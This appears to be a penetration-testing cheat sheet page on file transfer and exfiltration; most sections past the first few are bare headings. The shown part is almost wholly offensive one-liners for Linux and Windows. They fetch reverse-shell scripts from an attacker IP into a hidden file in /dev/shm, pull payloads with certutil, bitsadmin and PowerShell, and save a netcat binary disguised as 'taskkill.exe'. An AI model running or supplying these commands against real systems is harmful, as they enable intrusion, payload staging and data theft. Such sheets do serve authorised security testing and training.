Exfiltration
Copy&Paste Base64
Linux
base64 -w0 <file> #Encode file
base64 -d file #Decode fileWindows
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dllHTTP
Linux
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSDWindows
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -AsynchronousUpload files
FTP
FTP server (python)
FTP server (NodeJS)
FTP server (pure-ftp)
Windows client
SMB
SCP
NC
/dev/tcp
Download file from victim
Upload file to victim
ICMP
SMTP
TFTP
PHP
VBScript
Victim
Debug.exe
DNS
Last updated